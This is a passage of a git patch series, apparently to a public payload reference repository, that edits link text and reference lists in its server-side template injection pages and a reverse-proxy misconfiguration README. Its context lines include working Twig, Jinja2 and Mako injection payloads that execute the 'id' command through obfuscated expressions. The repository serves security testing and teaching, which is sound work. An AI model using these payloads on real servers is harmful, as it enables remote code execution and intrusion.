[yeswehack/server-side-template-injection-exploitation](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation). --- @@ -71,7 +71,7 @@ Execute system comman (command: `id`): {{passthru(implode(Null,array_map(chr(99)|cat:chr(104)|cat:chr(114),[105,100])))}} ``` -Reference and explanation of payload can be found [here](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation). +Reference and explanation of payload can be found [yeswehack/server-side-template-injection-exploitation](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation). --- @@ -155,7 +155,7 @@ The following payload, which harnesses the built-in `_context` variable, also ac {{id~passthru~_context|join|slice(2,2)|split(000)|map(_context|join|slice(5,8))}} ``` -Reference and explanation of payload can be found [here](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation). +Reference and explanation of payload can be found [yeswehack/server-side-template-injection-exploitation](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation). --- @@ -295,5 +295,5 @@ layout template: ## References -- [Limitations are just an illusion – advanced server-side template exploitation with RCE everywhere - YesWeHack, Brumens - March 24, 2025](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation) +- [Limitations are just an illusion – advanced server-side template exploitation with RCE everywhere - Brumens - March 24, 2025](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation) - [Server Side Template Injection (SSTI) via Twig escape handler - March 21, 2024](https://github.com/getgrav/grav/security/advisories/GHSA-2m7x-c7px-hp58) diff --git a/Server Side Template Injection/Python.md b/Server Side Template Injection/Python.md index 6a50964372..75e4027d51 100644 --- a/Server Side Template Injection/Python.md +++ b/Server Side Template Injection/Python.md @@ -272,7 +272,7 @@ Execute the system command `id`: {{self._TemplateReference__context.cycler.__init__.__globals__.os.popen(self.__init__.__globals__.__str__()[1786:1788]).read()}} ``` -Reference and explanation of payload can be found [here](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation). +Reference and explanation of payload can be found [yeswehack/server-side-template-injection-exploitation](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation). ### Jinja2 - Filter Bypass @@ -428,13 +428,13 @@ ${self.module.cache.util.os.popen(str().join(chr(i)for(i)in[105,100])).read()} <%import os%>${os.popen(str().join(chr(i)for(i)in[105,100])).read()} ``` -Reference and explanation of payload can be found [here](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation). +Reference and explanation of payload can be found [yeswehack/server-side-template-injection-exploitation](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation). ## References - [Cheatsheet - Flask & Jinja2 SSTI - phosphore - September 3, 2018](https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti) - [Exploring SSTI in Flask/Jinja2, Part II - Tim Tomes - March 11, 2016](https://web.archive.org/web/20170710015954/https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/) - [Jinja2 template injection filter bypasses - Sebastian Neef - August 28, 2017](https://0day.work/jinja2-template-injection-filter-bypasses/) +- [Limitations are just an illusion – advanced server-side template exploitation with RCE everywhere - Brumens - March 24, 2025](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation) - [Python context free payloads in Mako templates - podalirius - August 26, 2021](https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/) -- [The minefield between syntaxes: exploiting syntax confusions in the wild - YesWeHack, Brumens - October 17, 2025](https://www.yeswehack.com/learn-bug-bounty/syntax-confusion-ambiguous-parsing-exploits) -- [Limitations are just an illusion – advanced server-side template exploitation with RCE everywhere - YesWeHack, Brumens - March 24, 2025](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation) +- [The minefield between syntaxes: exploiting syntax confusions in the wild - Brumens - October 17, 2025](https://www.yeswehack.com/learn-bug-bounty/syntax-confusion-ambiguous-parsing-exploits) From 2c2552d1fe4c4ef9815f9560525bf0d4e5226186 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sat, 3 Jan 2026 16:48:14 +0100 Subject: [PATCH 11/12] Update Gixy-Next link in README.md --- Reverse Proxy Misconfigurations/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Reverse Proxy Misconfigurations/README.md b/Reverse Proxy Misconfigurations/README.md index ce3b541466..33875268d6 100644 --- a/Reverse Proxy Misconfigurations/README.md +++ b/Reverse Proxy Misconfigurations/README.md @@ -21,7 +21,7 @@ ## Tools * [yandex/gixy](https://github.com/yandex/gixy) - Nginx configuration static analyzer. -- [Gixy-Next](https://gixy.io/) - Actively maintained Python3 fork of gixy. +- [MegaManSec/Gixy-Next](https://github.com/MegaManSec/Gixy-Next) - Actively maintained Python3 fork of gixy. * [shiblisec/Kyubi](https://github.com/shiblisec/Kyubi) - A tool to discover Nginx alias traversal misconfiguration. * [laluka/bypass-url-parser](https://github.com/laluka/bypass-url-parser) - Tool that tests MANY url bypasses to reach a 40X protected page. From cd548698eb39c0fb53232871a3d39c6fa51ff75c Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sat, 3 Jan 2026 16:52:21 +0100 Subject: [PATCH 12/12] Reverse Proxy Misconfigurations markdown linting --- Reverse Proxy Misconfigurations/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Reverse Proxy Misconfigurations/README.md b/Reverse Proxy Misconfigurations/README.md index 33875268d6..963390c9cf 100644 --- a/Reverse Proxy Misconfigurations/README.md +++ b/Reverse Proxy Misconfigurations/README.md @@ -21,7 +21,7 @@ ## Tools * [yandex/gixy](https://github.com/yandex/gixy) - Nginx configuration static analyzer. -- [MegaManSec/Gixy-Next](https://github.com/MegaManSec/Gixy-Next) - Actively maintained Python3 fork of gixy. +* [MegaManSec/Gixy-Next](https://github.com/MegaManSec/Gixy-Next) - Actively maintained Python3 fork of gixy. * [shiblisec/Kyubi](https://github.com/shiblisec/Kyubi) - A tool to discover Nginx alias traversal misconfiguration. * [laluka/bypass-url-parser](https://github.com/laluka/bypass-url-parser) - Tool that tests MANY url bypasses to reach a 40X protected page.